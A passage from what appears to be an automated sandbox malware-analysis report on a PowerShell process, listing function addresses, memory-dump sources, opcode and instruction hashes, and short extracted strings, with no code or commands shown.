                                  • Instruction ID: 2a9475f6f42a439b0a94ebe15fde3d2b31de9d8a90ee391008b76f83aa86ed08
                                  • Opcode Fuzzy Hash: 4e160ce8cfb3151b5ab4a2e26fc416572dfd9223045b1ded1212c5f2ed3ddc1a
                                  • Instruction Fuzzy Hash: 8C312422F1FACE0BE7B2A7685C722BCA6D1AF55254B5E00BAE45DC31E3ED5C6C048341
                                  Function 00007FFD9BAC74BC Relevance: .1, Instructions: 102COMMON
                                  Download Yara Rule
                                  Memory Dump Source
                                  • Source File: 00000001.00000002.1889667625.00007FFD9BAC0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9BAC0000, based on PE: false
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_1_2_7ffd9bac0000_powershell.jbxd
                                  Similarity
                                  • API ID:
                                  • String ID:
                                  • API String ID:
                                  • Opcode ID: a6a9e9b6fff5ef7e25420a89ce035b09186ee96aac4807c8228c6ca64aa1c129
                                  • Instruction ID: b5c1d0c733ee84c7ef4ad2d1098f2b69da4cc70cacfab28b4158fcbff5e6e421
                                  • Opcode Fuzzy Hash: a6a9e9b6fff5ef7e25420a89ce035b09186ee96aac4807c8228c6ca64aa1c129
                                  • Instruction Fuzzy Hash: 47210622B0DA0D4AE775AB6C78622F977C0EFC5231B160176D46EC36A2DE16ED068281
                                  Function 00007FFD9BAC4604 Relevance: .1, Instructions: 97COMMON
                                  Download Yara Rule
                                  Memory Dump Source
                                  • Source File: 00000001.00000002.1889667625.00007FFD9BAC0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9BAC0000, based on PE: false
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_1_2_7ffd9bac0000_powershell.jbxd
                                  Similarity
                                  • API ID:
                                  • String ID:
                                  • API String ID:
                                  • Opcode ID: 42653db2df80196ae00cc43aa572d22e3d9527d19640f51543910f5a2e389456
                                  • Instruction ID: 3f4493f083dd215b2a7ad638f3c88849ef0230c8591b914567c1a9b0ac43d26f
                                  • Opcode Fuzzy Hash: 42653db2df80196ae00cc43aa572d22e3d9527d19640f51543910f5a2e389456
                                  • Instruction Fuzzy Hash: 1B212622B0FA8E0BE7B9B768547427866C2EF90250B5A00BED45DC72FBDD69AC058305
                                  Function 00007FFD9B9FB734 Relevance: .1, Instructions: 92COMMON
                                  Download Yara Rule
                                  Memory Dump Source
                                  • Source File: 00000001.00000002.1889184103.00007FFD9B9F0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9B9F0000, based on PE: false
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_1_2_7ffd9b9f0000_powershell.jbxd
                                  Similarity
                                  • API ID:
                                  • String ID:
                                  • API String ID:
                                  • Opcode ID: 81d3a8379fd9924d7033c16248cc2bea8fc3af7b52b69c244183d82ac5861758
                                  • Instruction ID: 92adc6c2ad3876c012ecf1830270d946ad9e71fb64fe9aef687f5ac47b10619e
                                  • Opcode Fuzzy Hash: 81d3a8379fd9924d7033c16248cc2bea8fc3af7b52b69c244183d82ac5861758
                                  • Instruction Fuzzy Hash: F3311E30B2A54D9EFBB49F54CC26BF93BD4FF45329F410139D40E864A2CA386E85CA51
                                  Function 00007FFD9BAC19AF Relevance: .1, Instructions: 80COMMON
                                  Download Yara Rule
                                  Memory Dump Source
                                  • Source File: 00000001.00000002.1889667625.00007FFD9BAC0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9BAC0000, based on PE: false
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_1_2_7ffd9bac0000_powershell.jbxd
                                  Similarity
                                  • API ID:
                                  • String ID:
                                  • API String ID:
                                  • Opcode ID: 20fe99d7057f11cf98ade5caa0a01685b64ecbfcee1f2a93ade2950992fceec3
                                  • Instruction ID: 68cdf50e3d201b74e02789bfc53127ef25aacfaa6aee8d617ea211b205081714
                                  • Opcode Fuzzy Hash: 20fe99d7057f11cf98ade5caa0a01685b64ecbfcee1f2a93ade2950992fceec3
                                  • Instruction Fuzzy Hash: 7B21F262F0FAC90FE761A76858792B86BD1DF66650B1944FFC0ADCB2E3DC495C098302
                                  Function 00007FFD9BAC9C7D Relevance: .1, Instructions: 71COMMON
                                  Download Yara Rule
                                  Memory Dump Source
                                  • Source File: 00000001.00000002.1889667625.00007FFD9BAC0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9BAC0000, based on PE: false
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_1_2_7ffd9bac0000_powershell.jbxd
                                  Similarity
                                  • API ID:
                                  • String ID:
                                  • API String ID:
                                  • Opcode ID: 12ed6531d2e16921eaa9e0c5c4bc5715f9e9449a6f2f48ef230b207fdde236be
                                  • Instruction ID: 8d12508b25f0c7fa5e180535e6151ded63fc00fb0849e81357d512742e6fbf3e
                                  • Opcode Fuzzy Hash: 12ed6531d2e16921eaa9e0c5c4bc5715f9e9449a6f2f48ef230b207fdde236be
                                  • Instruction Fuzzy Hash: 60110822B0E6890FEB65E7584CA51F877D1FF96320F0401FAE09D971D3DD592D444741
                                  Function 00007FFD9B9F54E9 Relevance: .1, Instructions: 57COMMON
                                  Download Yara Rule
                                  Memory Dump Source
                                  • Source File: 00000001.00000002.1889184103.00007FFD9B9F0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9B9F0000, based on PE: false
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_1_2_7ffd9b9f0000_powershell.jbxd
                                  Similarity
                                  • API ID:
                                  • String ID:
                                  • API String ID:
                                  • Opcode ID: cffc4da6fa69c2a920888427ca416e81b9a9b0e8c44e53ca4a3dc5234435e799
                                  • Instruction ID: 5ef2ccc9641eb5c277cdda62288d3841059119c9cce90af6f38d7abcf5b6d222
                                  • Opcode Fuzzy Hash: cffc4da6fa69c2a920888427ca416e81b9a9b0e8c44e53ca4a3dc5234435e799
                                  • Instruction Fuzzy Hash: A901F77271D6090FEB68E95CE4625B433D1EBA5321B10007AE98BC32A7D916F8468285
                                  Function 00007FFD9B9F41E5 Relevance: .0, Instructions: 49COMMON
                                  Download Yara Rule
                                  Memory Dump Source
                                  • Source File: 00000001.00000002.1889184103.00007FFD9B9F0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9B9F0000, based on PE: false
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_1_2_7ffd9b9f0000_powershell.jbxd
                                  Similarity
                                  • API ID:
                                  • String ID:
                                  • API String ID:
                                  • Opcode ID: 348d5fb5261f51f812e1f49a056d31a35d386422633fb1efa08e0a84813b5c5b
                                  • Instruction ID: 822669f463e370ccb6aecf64fb08f71695fe8bc0e22175d1b697767548c4bd7d
                                  • Opcode Fuzzy Hash: 348d5fb5261f51f812e1f49a056d31a35d386422633fb1efa08e0a84813b5c5b
                                  • Instruction Fuzzy Hash: A501677121CB0C4FD748EF4CE451AA5B7E0FB95364F10056DE58AC36A5D736E882CB45
                                  Function 00007FFD9B9F5558 Relevance: .0, Instructions: 39COMMON
                                  Download Yara Rule
                                  Memory Dump Source
                                  • Source File: 00000001.00000002.1889184103.00007FFD9B9F0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9B9F0000, based on PE: false
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_1_2_7ffd9b9f0000_powershell.jbxd
                                  Similarity
                                  • API ID:
                                  • String ID:
                                  • API String ID:
                                  • Opcode ID: f5a76ab5b1cca0155a5982a91d980581022af711b5266dcffb5e402d787bcfe5
                                  • Instruction ID: edecb15cc364a9010e8ff384472bf96b4bf9aed369dbadf5e2df474f720a16e8
                                  • Opcode Fuzzy Hash: f5a76ab5b1cca0155a5982a91d980581022af711b5266dcffb5e402d787bcfe5
                                  • Instruction Fuzzy Hash: EEF0A73271C6044FDB4CAA0CF4529B473D1E785320B10017EE48BC2296D917E8428681

                                  Non-executed Functions

                                  Function 00007FFD9B9F0D92 Relevance: .4, Instructions: 403COMMON
                                  Download Yara Rule
                                  Memory Dump Source
                                  • Source File: 00000001.00000002.1889184103.00007FFD9B9F0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9B9F0000, based on PE: false
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_1_2_7ffd9b9f0000_powershell.jbxd
                                  Similarity
                                  • API ID:
                                  • String ID:
                                  • API String ID:
                                  • Opcode ID: 70a03f52a456435edf1a2c948af50a7dd6748a682cf000943729206c2d9a983f
                                  • Instruction ID: f0d149d6b03520580bd5b2d1119402f46befbd5da814d72d9d12793787e93408
                                  • Opcode Fuzzy Hash: 70a03f52a456435edf1a2c948af50a7dd6748a682cf000943729206c2d9a983f
                                  • Instruction Fuzzy Hash: A1C10493B1F6D62FE7625B6828750E47F94AF2267871E00FBC4D84F0E39D056D4A8392

                                  Executed Functions

                                  Function 04C8F320 Relevance: .3, Instructions: 281COMMON
                                  Download Yara Rule
                                  Memory Dump Source
                                  • Source File: 00000003.00000002.2683167360.0000000004C80000.00000040.00000800.00020000.00000000.sdmp, Offset: 04C80000, based on PE: false
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_3_2_4c80000_powershell.jbxd
                                  Similarity
                                  • API ID:
                                  • String ID:
                                  • API String ID:
                                  • Opcode ID: fa73db551b295f6e0df477d452fb9ba5a360b73e94d007ab39483453c94d6c92
                                  • Instruction ID: 08dbeb48a88156f329f96c6bc95560fc5025dec10964b52e24b69ddb39fa2312
                                  • Opcode Fuzzy Hash: fa73db551b295f6e0df477d452fb9ba5a360b73e94d007ab39483453c94d6c92
                                  • Instruction Fuzzy Hash: 9AB15F70E00209DFDF10DFA9D9857AEBBF2AF88318F14852DD815A7254EB74A946CF81
                                  Function 04C8FBF0 Relevance: .3, Instructions: 266COMMON
                                  Download Yara Rule
                                  Memory Dump Source
                                  • Source File: 00000003.00000002.2683167360.0000000004C80000.00000040.00000800.00020000.00000000.sdmp, Offset: 04C80000, based on PE: false
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_3_2_4c80000_powershell.jbxd
                                  Similarity
                                  • API ID:
                                  • String ID:
                                  • API String ID:
                                  • Opcode ID: 08bdbcf5d748e29a65ac268633d431a258f091494de42a2b88da3e9ca250edf0
                                  • Instruction ID: e5e4b95b34de191a4886678cba6d4595c0e185c66f04c343143d689634cba472
                                  • Opcode Fuzzy Hash: 08bdbcf5d748e29a65ac268633d431a258f091494de42a2b88da3e9ca250edf0
                                  • Instruction Fuzzy Hash: 33B15E71E00209CFDF10DFA9D98179DBBF2AF88318F14852DE815EB294EB74A945CB81
                                  Function 07B15D48 Relevance: 23.5, Strings: 18, Instructions: 1038COMMON
                                  Download Yara Rule
                                  Strings
                                  Memory Dump Source
                                  • Source File: 00000003.00000002.2708841117.0000000007B10000.00000040.00000800.00020000.00000000.sdmp, Offset: 07B10000, based on PE: false
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_3_2_7b10000_powershell.jbxd
                                  Similarity
                                  • API ID:
                                  • String ID: (f%l$(f%l$(f%l$(f%l$(f%l$(f%l$(f%l$(f%l$4'^q$4'^q$4'^q$4'^q$4'^q$4'^q$4'^q$4'^q$tP^q$tP^q
                                  • API String ID: 0-11318674
                                  • Opcode ID: 5b2e9533cd507a57c825967c8af8a27bd947d88af9b8ce2230bf5b662a47b049
                                  • Instruction ID: f3917ca02fb39aff611c5d6a677d23c9a4a677429d299e932b1a47edfe3034e1
                                  • Opcode Fuzzy Hash: 5b2e9533cd507a57c825967c8af8a27bd947d88af9b8ce2230bf5b662a47b049
                                  • Instruction Fuzzy Hash: E59292F0A002199FEB24CB68C954B6ABBB2FF85304F5485E9D805AB355CF32DC95CB91
                                  Function 07B12EC8 Relevance: 11.6, Strings: 9, Instructions: 352COMMON
                                  Download Yara Rule
                                  Strings
                                  Memory Dump Source
                                  • Source File: 00000003.00000002.2708841117.0000000007B10000.00000040.00000800.00020000.00000000.sdmp, Offset: 07B10000, based on PE: false
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_3_2_7b10000_powershell.jbxd
                                  Similarity
                                  • API ID:
                                  • String ID: 4'^q$4'^q$84#l$84#l$tP^q$tP^q$$^q$$^q$$^q
                                  • API String ID: 0-3712511203
                                  • Opcode ID: 9d97b4e857f87c56a1b6cbecf07ae43c0048f1b1236301bb212b70e0378d5337
                                  • Instruction ID: a723edc12e87b8e9797dcf41a0efef70c3084f37e5b96e3e07ffa4a187094511
                                  • Opcode Fuzzy Hash: 9d97b4e857f87c56a1b6cbecf07ae43c0048f1b1236301bb212b70e0378d5337
                                  • Instruction Fuzzy Hash: 9DC108B0B083459FD7158B2888597A6BFF1EF86210F59C4EBD404CF256EB32C945C7A2
                                  Function 07B14EB8 Relevance: 8.2, Strings: 6, Instructions: 706COMMON
                                  Download Yara Rule
                                  Strings
                                  Memory Dump Source
                                  • Source File: 00000003.00000002.2708841117.0000000007B10000.00000040.00000800.00020000.00000000.sdmp, Offset: 07B10000, based on PE: false
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_3_2_7b10000_powershell.jbxd
                                  Similarity
                                  • API ID:
                                  • String ID: (f%l$(f%l$(f%l$(f%l$(f%l$(f%l
                                  • API String ID: 0-3573161573
                                  • Opcode ID: d240f2aed488aa95418283dffee660c8f3c1c5d1dfcab7d630f08682f629a3b3
                                  • Instruction ID: 34a90674d85c9959022c2dffe551d6bf9301719e10ce048126a43d7448b68a54
                                  • Opcode Fuzzy Hash: d240f2aed488aa95418283dffee660c8f3c1c5d1dfcab7d630f08682f629a3b3
                                  • Instruction Fuzzy Hash: FD523BB4B00208DFE724CB98C545E6ABBB2EF85314F65C0A9D8059F765CB72EC56CB81
                                  Function 07B17828 Relevance: 7.8, Strings: 6, Instructions: 339COMMON
                                  Download Yara Rule
                                  Strings
                                  Memory Dump Source
                                  • Source File: 00000003.00000002.2708841117.0000000007B10000.00000040.00000800.00020000.00000000.sdmp, Offset: 07B10000, based on PE: false
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_3_2_7b10000_powershell.jbxd
                                  Similarity
                                  • API ID:
                                  • String ID: 4'^q$4'^q$4'^q$4'^q$4'^q$4'^q
                                  • API String ID: 0-2822668367
                                  • Opcode ID: 5db48dc7a2e286b42e1a3824762f932dcca4dd6f3699569c61eb0e95d0a8ebed
                                  • Instruction ID: c9a77dd70bf65b87c0224eea3787e795d05aadbc7c6ac5f4bcc01c796b19de4e
                                  • Opcode Fuzzy Hash: 5db48dc7a2e286b42e1a3824762f932dcca4dd6f3699569c61eb0e95d0a8ebed
                                  • Instruction Fuzzy Hash: B1D1C0F4B502099FDB14DB68C954BAEBBA2EF88304F60C469E8016F395CF75DC858B91
                                  Function 07B1675B Relevance: 5.4, Strings: 4, Instructions: 395COMMON
                                  Download Yara Rule
                                  Strings
                                  Memory Dump Source
                                  • Source File: 00000003.00000002.2708841117.0000000007B10000.00000040.00000800.00020000.00000000.sdmp, Offset: 07B10000, based on PE: false
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_3_2_7b10000_powershell.jbxd
                                  Similarity
                                  • API ID:
                                  • String ID: (f%l$(f%l$4'^q$4'^q
                                  • API String ID: 0-3494269959
                                  • Opcode ID: c63e1727c152304d687770cb64997d54ebeddaeb27aab63d93df2b47be926166
                                  • Instruction ID: 4e23e2e9b6f083ad3d45ac69ab3921debe74434e4fbf6130d7254f230be32a05
                                  • Opcode Fuzzy Hash: c63e1727c152304d687770cb64997d54ebeddaeb27aab63d93df2b47be926166
                                  • Instruction Fuzzy Hash: 9FF1A1B0A402189FD724DB68C954F6ABBB2EF84304F5084E9D9096F3A5DF76DC818F91
                                  Function 07B15940 Relevance: 5.3, Strings: 4, Instructions: 275COMMON
                                  Download Yara Rule
                                  Strings
                                  Memory Dump Source
                                  • Source File: 00000003.00000002.2708841117.0000000007B10000.00000040.00000800.00020000.00000000.sdmp, Offset: 07B10000, based on PE: false
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_3_2_7b10000_powershell.jbxd
                                  Similarity
                                  • API ID:
                                  • String ID: (f%l$(f%l$(f%l$(f%l
                                  • API String ID: 0-3942150577
                                  • Opcode ID: 1018c6c9c124e8febdeabf7929898605f879cc6d109b47f2e5f08389eae61d91
                                  • Instruction ID: 8c5c7675084b57c50c74cc77b53d3db4f129c15133f41ed97918798d0891c16b
                                  • Opcode Fuzzy Hash: 1018c6c9c124e8febdeabf7929898605f879cc6d109b47f2e5f08389eae61d91
                                  • Instruction Fuzzy Hash: 56B180F4A402089FDB24DB58C985BAEBBE3EFC8304F5084A9D8056B755CB72DC65CB91
                                  Function 04C8B830 Relevance: 4.3, Strings: 3, Instructions: 517COMMON
                                  Download Yara Rule
                                  Strings
                                  Memory Dump Source
                                  • Source File: 00000003.00000002.2683167360.0000000004C80000.00000040.00000800.00020000.00000000.sdmp, Offset: 04C80000, based on PE: false
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_3_2_4c80000_powershell.jbxd
                                  Similarity
                                  • API ID:
                                  • String ID: Hbq$$^q$$^q
                                  • API String ID: 0-1611274095
                                  • Opcode ID: 0997f1ac3111922363e80471932f5ab9f6477fce4b9a7e562afcc406e4f03a38
                                  • Instruction ID: 728c48c23cc5f3206630a5f8b9c4711e5d1424c0fbe72adf62f235539533959c
                                  • Opcode Fuzzy Hash: 0997f1ac3111922363e80471932f5ab9f6477fce4b9a7e562afcc406e4f03a38
                                  • Instruction Fuzzy Hash: FE226434B002148FCB25EF25D8946AEB7B2BF89304F1584ADE40AAB355DF35AE45CF91
                                  Function 07B1780A Relevance: 4.0, Strings: 3, Instructions: 272COMMON
                                  Download Yara Rule
                                  Strings
                                  Memory Dump Source
                                  • Source File: 00000003.00000002.2708841117.0000000007B10000.00000040.00000800.00020000.00000000.sdmp, Offset: 07B10000, based on PE: false
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_3_2_7b10000_powershell.jbxd
                                  Similarity
                                  • API ID:
                                  • String ID: 4'^q$4'^q$4'^q
                                  • API String ID: 0-1196845430
                                  • Opcode ID: 736477f17dab14d5a9d8f427c2deefe379f86410275975940d447c57cae2c6ff
                                  • Instruction ID: 561d9ace949991cfce79d1db31db45f47e98393484f10d5ace23377e383b65e3
                                  • Opcode Fuzzy Hash: 736477f17dab14d5a9d8f427c2deefe379f86410275975940d447c57cae2c6ff
                                  • Instruction Fuzzy Hash: 4EB1AFF4A102099FDB14CB64C954B9EBBB2EF89304F54C0A9E8016F355CB75EC86CB91
                                  Function 07B14E99 Relevance: 3.0, Strings: 2, Instructions: 534COMMON
                                  Download Yara Rule
                                  Strings
                                  Memory Dump Source
                                  • Source File: 00000003.00000002.2708841117.0000000007B10000.00000040.00000800.00020000.00000000.sdmp, Offset: 07B10000, based on PE: false
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_3_2_7b10000_powershell.jbxd
                                  Similarity
                                  • API ID:
                                  • String ID: (f%l$(f%l
                                  • API String ID: 0-2591883296
                                  • Opcode ID: 2f90ffc93ae8b2c2f63f9a3cdf62f33360bcce653875b1536a2134d49f1879dd
                                  • Instruction ID: ef58447c327824e93df9606bfbbf48cefbe5b4f852f9d931dc034cce662f8589
                                  • Opcode Fuzzy Hash: 2f90ffc93ae8b2c2f63f9a3cdf62f33360bcce653875b1536a2134d49f1879dd
                                  • Instruction Fuzzy Hash: F5222AB4A00205DFE724CF58C485E6ABBB2FF85314FA5C1A9D8099B365C772EC56CB81
                                  Function 07B196F0 Relevance: 2.9, Strings: 2, Instructions: 363COMMON
                                  Download Yara Rule
                                  Strings
                                  Memory Dump Source
                                  • Source File: 00000003.00000002.2708841117.0000000007B10000.00000040.00000800.00020000.00000000.sdmp, Offset: 07B10000, based on PE: false
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_3_2_7b10000_powershell.jbxd
                                  Similarity
                                  • API ID:
                                  • String ID: 4'^q$4'^q
                                  • API String ID: 0-2697143702
                                  • Opcode ID: 615d86ec052440715a214ca38fbf644848639e9ae7949c860774e0a8a98467f8
                                  • Instruction ID: 8f6a030080eb4a45a7c3944910fdbaf0377d52e699d32ee511be62adfd40972a
                                  • Opcode Fuzzy Hash: 615d86ec052440715a214ca38fbf644848639e9ae7949c860774e0a8a98467f8
                                  • Instruction Fuzzy Hash: 9EC148F1B002C98FDB108B6894212ABFBE6EFC5210F54C0BAD849CB651DB32E955C792
                                  Function 07B15919 Relevance: 2.8, Strings: 2, Instructions: 254COMMON
                                  Download Yara Rule
                                  Strings
                                  Memory Dump Source
                                  • Source File: 00000003.00000002.2708841117.0000000007B10000.00000040.00000800.00020000.00000000.sdmp, Offset: 07B10000, based on PE: false
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_3_2_7b10000_powershell.jbxd
                                  Similarity
                                  • API ID:
                                  • String ID: (f%l$(f%l
                                  • API String ID: 0-2591883296
                                  • Opcode ID: f5e38dfc697400e5d920c6aff737ad0eb29ce2105e4e840105afe693309dbe9a
                                  • Instruction ID: 68353d2e910c724c9d28d1f8b1fa84cee36fbeb137b10dc6e2eb7cba2addba1b
                                  • Opcode Fuzzy Hash: f5e38dfc697400e5d920c6aff737ad0eb29ce2105e4e840105afe693309dbe9a
                                  • Instruction Fuzzy Hash: 1AA17FF4A002059FEB24CF54C985F9ABBF2EF89314F5480A9E8046B761CB76EC65CB51
                                  Function 07B17F83 Relevance: 2.7, Strings: 2, Instructions: 194COMMON
                                  Download Yara Rule
                                  Strings
                                  Memory Dump Source
                                  • Source File: 00000003.00000002.2708841117.0000000007B10000.00000040.00000800.00020000.00000000.sdmp, Offset: 07B10000, based on PE: false
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_3_2_7b10000_powershell.jbxd
                                  Similarity
                                  • API ID:
                                  • String ID: 4'^q$4'^q
                                  • API String ID: 0-2697143702
                                  • Opcode ID: 3819a4a9e4e4d261245210d3b6e2b6d3e790e7275d1477332b8bb331f461ddb9
                                  • Instruction ID: 844cd3ecdfc74541d89166c3cb13ed366d4672306914af602c129bde8b8eff58
                                  • Opcode Fuzzy Hash: 3819a4a9e4e4d261245210d3b6e2b6d3e790e7275d1477332b8bb331f461ddb9
                                  • Instruction Fuzzy Hash: 3B516DF1F002068FDB144B398809B6BBBD2FF86224FA584EAD5518F356DB31C865C791
                                  Function 07B18806 Relevance: 2.6, Strings: 2, Instructions: 135COMMON
                                  Download Yara Rule
                                  Strings
                                  Memory Dump Source
                                  • Source File: 00000003.00000002.2708841117.0000000007B10000.00000040.00000800.00020000.00000000.sdmp, Offset: 07B10000, based on PE: false
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_3_2_7b10000_powershell.jbxd
                                  Similarity
                                  • API ID:
                                  • String ID: 4'^q$4'^q
                                  • API String ID: 0-2697143702
                                  • Opcode ID: 98e225ad328bec6fddbb1cdd40cab7136a21df6383ed5f720015a8b31ee94d56
                                  • Instruction ID: b0341d01687ceee8a3350a634e590baa0b4091cfa3e7e6884e25ee89e00ec12e
                                  • Opcode Fuzzy Hash: 98e225ad328bec6fddbb1cdd40cab7136a21df6383ed5f720015a8b31ee94d56
                                  • Instruction Fuzzy Hash: D541DBF2B04215DFEF24567458586ABBB92FF81234B5441EAD902CF6A6DE31C846C3A2
                                  Function 07B15599 Relevance: 1.6, Strings: 1, Instructions: 395COMMON
                                  Download Yara Rule
                                  Strings
                                  Memory Dump Source
                                  • Source File: 00000003.00000002.2708841117.0000000007B10000.00000040.00000800.00020000.00000000.sdmp, Offset: 07B10000, based on PE: false
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_3_2_7b10000_powershell.jbxd
                                  Similarity
                                  • API ID:
                                  • String ID: (f%l
                                  • API String ID: 0-2758742731
                                  • Opcode ID: 669eaaa93e1b8bef797835c60e5dd39618bc463a29a1519a5f241da48bdfa1c8
                                  • Instruction ID: 1ad94dbf9c36998c76dc6d0617744302cef2d26534a9853f2cf01d7f55cfd8fc
                                  • Opcode Fuzzy Hash: 669eaaa93e1b8bef797835c60e5dd39618bc463a29a1519a5f241da48bdfa1c8
                                  • Instruction Fuzzy Hash: 1BF13BB4A10205DFE724CF98C485E6ABBB2FF84314FA480A9D9059F755CB72EC56CB81
                                  Function 04C84AA8 Relevance: .3, Instructions: 327COMMON
                                  Download Yara Rule
                                  Memory Dump Source
                                  • Source File: 00000003.00000002.2683167360.0000000004C80000.00000040.00000800.00020000.00000000.sdmp, Offset: 04C80000, based on PE: false
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_3_2_4c80000_powershell.jbxd
                                  Similarity
                                  • API ID:
                                  • String ID:
                                  • API String ID:
                                  • Opcode ID: dfc4c494d791bbf3b328ec70177e2e1cb160c0bef4c6417b26caad7cf5025189
                                  • Instruction ID: bf1dffb8b36c0456d356f4000f7b32df09e1df125297b05c228fe29ad1c82820
                                  • Opcode Fuzzy Hash: dfc4c494d791bbf3b328ec70177e2e1cb160c0bef4c6417b26caad7cf5025189
                                  • Instruction Fuzzy Hash: 77D14B34A00219EFCB18DF98D584AADFBB2FF49314F258159E805AB361D735ED82CB94
                                  Function 04C89180 Relevance: .3, Instructions: 323COMMON
                                  Download Yara Rule
                                  Memory Dump Source
                                  • Source File: 00000003.00000002.2683167360.0000000004C80000.00000040.00000800.00020000.00000000.sdmp, Offset: 04C80000, based on PE: false
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_3_2_4c80000_powershell.jbxd
                                  Similarity
                                  • API ID:
                                  • String ID:
                                  • API String ID:
                                  • Opcode ID: 3b0ee9fd26ecea6d4f8a8c4afd401016b2ab6a1ef84efb1c1196a688196a0b97
                                  • Instruction ID: fb12b3b67ef68e9b324a5f7cbff8c309ebded97636cccc61dc5d103ee3a2c040
                                  • Opcode Fuzzy Hash: 3b0ee9fd26ecea6d4f8a8c4afd401016b2ab6a1ef84efb1c1196a688196a0b97
                                  • Instruction Fuzzy Hash: 11C1AE75A002489FCB14EFA9D584AADBBF2FF85318F15855CE406AF265CB34ED49CB40
                                  Function 04C8F314 Relevance: .3, Instructions: 320COMMON
                                  Download Yara Rule
                                  Memory Dump Source
                                  • Source File: 00000003.00000002.2683167360.0000000004C80000.00000040.00000800.00020000.00000000.sdmp, Offset: 04C80000, based on PE: false
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_3_2_4c80000_powershell.jbxd
                                  Similarity
                                  • API ID:
                                  • String ID:
                                  • API String ID:
                                  • Opcode ID: e900c0960e2ca7b38edbf3d77a43c8a38432a840ccfb3f390407ef15b64bb903
                                  • Instruction ID: 54846861905fe253ea2fed2c7d2aecffa285fc803efceb3467576e8f58b95b5f
                                  • Opcode Fuzzy Hash: e900c0960e2ca7b38edbf3d77a43c8a38432a840ccfb3f390407ef15b64bb903
                                  • Instruction Fuzzy Hash: 29C14B70E00209DFDF10EFA9D8857ADBBF2AF88318F14852DD815A7254EB74A985CB91
                                  Function 04C839B0 Relevance: .3, Instructions: 315COMMON
                                  Download Yara Rule
                                  Memory Dump Source
                                  • Source File: 00000003.00000002.2683167360.0000000004C80000.00000040.00000800.00020000.00000000.sdmp, Offset: 04C80000, based on PE: false
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_3_2_4c80000_powershell.jbxd
                                  Similarity
                                  • API ID:
                                  • String ID:
                                  • API String ID:
                                  • Opcode ID: 5d007b2b1b12f7cae95a3cc2fc78f8d5e33e66dd1884d3eeef4ab5caf9133b1f
                                  • Instruction ID: 75893c6b7464e6dcbcc7aa5bee21c7203fd4ccaa4c1f452fb1727dfca7817ffc
                                  • Opcode Fuzzy Hash: 5d007b2b1b12f7cae95a3cc2fc78f8d5e33e66dd1884d3eeef4ab5caf9133b1f
                                  • Instruction Fuzzy Hash: AFD10874A00249EFCB14DF98D584AADFBB2FF48714F148569E805AB365C732ED81CB90
                                  Function 04C8FBE4 Relevance: .3, Instructions: 268COMMON
                                  Download Yara Rule
                                  Memory Dump Source
                                  • Source File: 00000003.00000002.2683167360.0000000004C80000.00000040.00000800.00020000.00000000.sdmp, Offset: 04C80000, based on PE: false
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_3_2_4c80000_powershell.jbxd
                                  Similarity
                                  • API ID:
                                  • String ID:
                                  • API String ID:
                                  • Opcode ID: f873a50f02fbc2f350d5e3330ccc0ad64e84e9adafb313477cb6e9fb4d9d6592
                                  • Instruction ID: c4386a261e0f6c9b40c7f0dabe935c2599d1fe60ba6940bf52812733922e89d6
                                  • Opcode Fuzzy Hash: f873a50f02fbc2f350d5e3330ccc0ad64e84e9adafb313477cb6e9fb4d9d6592
                                  • Instruction Fuzzy Hash: E5B16E70E00209DFDF20DFA9D88579DBBF2AF88318F14852DE815E7254EB74A945CB91
                                  Function 04C89948 Relevance: .2, Instructions: 236COMMON
                                  Download Yara Rule
                                  Memory Dump Source
                                  • Source File: 00000003.00000002.2683167360.0000000004C80000.00000040.00000800.00020000.00000000.sdmp, Offset: 04C80000, based on PE: false
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_3_2_4c80000_powershell.jbxd
                                  Similarity
                                  • API ID:
                                  • String ID:
                                  • API String ID:
                                  • Opcode ID: 377252adc33bd579e41eed97598da4cc658cb55f03f3b1e5e04a674abd657b2b
                                  • Instruction ID: 7d66d0441107bf01069e0ec1e355181b2b3b704c4825604654ba7ae5c05b94f3
                                  • Opcode Fuzzy Hash: 377252adc33bd579e41eed97598da4cc658cb55f03f3b1e5e04a674abd657b2b
